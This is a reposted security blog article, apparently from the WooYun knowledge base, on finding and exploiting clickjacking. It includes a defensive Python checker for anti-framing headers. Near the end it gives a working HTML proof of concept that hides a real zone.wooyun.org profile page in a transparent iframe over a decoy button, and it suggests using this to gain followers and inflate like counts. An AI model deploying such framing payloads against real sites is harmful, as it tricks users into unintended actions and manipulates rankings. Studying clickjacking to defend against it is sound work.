
Exploitation and utilization of clickjacking vulnerability

2022-06-11 04:05:00 Sword-heart

0x00 Brief introduction


1 When it comes to clickjacking, many people actually don't know what it is. Compared with XSS, clickjacking seems rather mysterious; the WooYun vulnerability library holds only about 10 related vulnerabilities.

2 Sleepy Dragon previously posted a technical write-up on clickjacking ("Clickjacking Brief Introduction"), which mainly covers how clickjacking arises and how to defend against it. Here I mainly cover how to find clickjacking and how to exploit it.

As a reminder, clickjacking and JSON hijacking are not the same thing at all; don't confuse the two.

0x01 Case studies


1 ClickJacking

Tencent Weibo ClickJacking

Sina Weibo clickjacking to gain followers

2 XSS combined with ClickJacking

Baidu main site reflected XSS vulnerability

A mouseover XSS exploit in one spot on Baidu Tieba

Baidu Translate reflected XSS (clickjacking demo)

As you can see, once combined with clickjacking, an XSS that looks useless on its own, or an unremarkable settings page, can still cause serious harm.

0x02 Worked example


After all that, I'm not sure it is clear yet, so look at the following example.

Using another low-level vulnerability to silently push and install arbitrary apps in the background on Peapod users' phones

He designed a page of his own, put a fake button on it, and then nested the original page in an iframe so that its push button overlapped the "claim the prize" button.

But whether it is a slip of the pen by the reporter or the reporter's own misunderstanding of clickjacking, there are some errors in the description.

The reporter's description is clearly wrong.

The correct principle should be this: the prize-claim page is at the bottom, while the iframed original page sits on top. Then, as in the first figure, the iframe is made completely transparent, so the user can only see the prize-claim page beneath it. When the user clicks to claim the prize, they are actually clicking the push button in the page above.

So the blue circle should be positioned "above", not "below".

0x03 Hunting ClickJacking in zone


Below Sleepy Dragon's article I saw Jianxin say that clickjacking defenses should be added to zone.

So I had a look: zone's "thank" action now has a confirm added, but in fact that only weakens clickjacking; it does not cure it, since it is entirely possible to construct two click points and trick the user into clicking both.

Beyond that, zone's follow, like and dislike features have no defense at all; judging by eye, zone probably has no clickjacking defense whatsoever. I did try the WooYun main site, though, and it does defend against clickjacking: it detects whether the URL has been nested in an iframe.
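The main site's check above is done in the browser, by script. The server-side equivalent is to answer with anti-framing headers, and a defender auditing pages like zone's profile, follow and like endpoints wants a quick way to tell which responses a third-party origin could still frame. The following is an added example, not code from the article or from WooYun; its URLs are placeholders and the header sets are constructed. It evaluates `X-Frame-Options` and CSP `frame-ancestors` for a given embedding origin, giving `frame-ancestors` precedence where both appear, which is how browsers that support CSP behave.

```python
# Added example (not the article's own code): decide from a page's HTTP response
# headers whether a given embedding origin may load it in an <iframe>. This is
# the check a defender runs to find pages that lack clickjacking protection.
# Sample header sets below are constructed for the demo; the URLs are placeholders.
from urllib.parse import urlsplit


def _origin(url):
    """Normalise a URL to its scheme://host[:port] origin."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()


def _frame_ancestors(csp):
    """Return the frame-ancestors source list from a CSP, or None if absent.
    A directive with no sources matches nothing, i.e. behaves like 'none'."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            return [s.lower() for s in parts[1:]] or ["'none'"]
    return None


def _source_matches(source, embedder, page):
    """Match one CSP source expression against the embedding origin.
    Ports are treated as part of the host string (a simplification)."""
    if source == "'none'":
        return False
    if source == "*":
        return True
    if source == "'self'":
        return embedder == page
    e_scheme, e_host = embedder.split("://", 1)
    if source.endswith(":"):                      # scheme-source, e.g. https:
        return e_scheme == source[:-1]
    if "://" in source:                           # host-source with a scheme
        s_scheme, s_host = source.split("://", 1)
        if s_scheme != e_scheme:
            return False
    else:                                         # host-source, any scheme
        s_host = source
    s_host = s_host.rstrip("/")
    if s_host.startswith("*."):                   # wildcard subdomain
        return e_host.endswith(s_host[1:])
    return s_host == e_host


def is_framable(headers, page_url, embedder_url):
    """True if a document at embedder_url could frame page_url, judging only by
    the anti-framing headers in `headers` (header names are case-insensitive)."""
    h = {k.lower(): v for k, v in headers.items()}
    page, embedder = _origin(page_url), _origin(embedder_url)
    # Browsers that support CSP ignore X-Frame-Options once frame-ancestors is set.
    sources = _frame_ancestors(h.get("content-security-policy", ""))
    if sources is not None:
        return any(_source_matches(s, embedder, page) for s in sources)
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return embedder == page
    # Missing header, or the obsolete ALLOW-FROM that modern browsers ignore:
    # the page can be framed from anywhere.
    return True


# Constructed sample responses standing in for pages a scanner might record.
SAMPLE_RESPONSES = {
    "https://zone.example/user/profile": {},
    "https://www.example/login": {"X-Frame-Options": "DENY"},
    "https://www.example/settings": {"x-frame-options": "sameorigin"},
    "https://www.example/widget": {
        "Content-Security-Policy": "default-src 'self'; frame-ancestors 'self' https://*.partner.example",
        "X-Frame-Options": "DENY",   # ignored because frame-ancestors is present
    },
    "https://www.example/old": {"X-Frame-Options": "ALLOW-FROM https://trusted.example"},
}


def unprotected_pages(responses, attacker_url="https://attacker.example/"):
    """List the URLs an unrelated origin could load in an iframe."""
    return sorted(url for url, hdrs in responses.items()
                  if is_framable(hdrs, url, attacker_url))


if __name__ == "__main__":
    for url in unprotected_pages(SAMPLE_RESPONSES):
        print("framable by a third party:", url)
```

Run against the constructed set, only the profile page with no header and the page relying on the obsolete `ALLOW-FROM` come back as framable by an unrelated origin; the `confirm` dialog the article mentions would not change this result, because the check is about whether the page can be loaded in a frame at all.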

Here is a test PoC; anyone interested can work out a better exploitation setup on their own.


```html
<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8" />
        <title>clickjacking demo</title>
    </head>
    <body>
        <!-- The wrapper is stacked on top (z-index 999); opacity 0.3 keeps the
             framed page faintly visible so the demo can be followed by eye. -->
        <div style="z-index:999;opacity:0.3;width:500px;height:500px;overflow:hidden;position:absolute;top:20px;left:20px;">
            <!-- The framed profile page is offset so its follow button lands
                 exactly over the decoy button below. -->
            <iframe id="inner" style="position:absolute;top:140px;width:1000px;height:500px;left:-484px;" src="http://zone.wooyun.org/user/px1624"></iframe>
        </div>
        <!-- Decoy button, stacked beneath the frame (z-index is a plain integer). -->
        <button id="anwoa" style="cursor:pointer;z-index:10;position:absolute;top:225px;left:200px;text-align:center;width:100px;height:57px;">Press me</button>
    </body>
</html>
```

With this clickjacking PoC code, you can gain yourself some followers on WooYun zone.

At the same time, you can also inflate the like count on your own posts in zone. It is said that this like count is closely tied to the main ranking algorithm inside zone!

This article comes from the WooYun knowledge base; its copyright belongs to the WooYun knowledge base!

Original site

Copyright notice
This article was created by [Sword-heart]; please include the original link when reposting, thanks
https://yzsam.com/2022/162/202206110342122952.html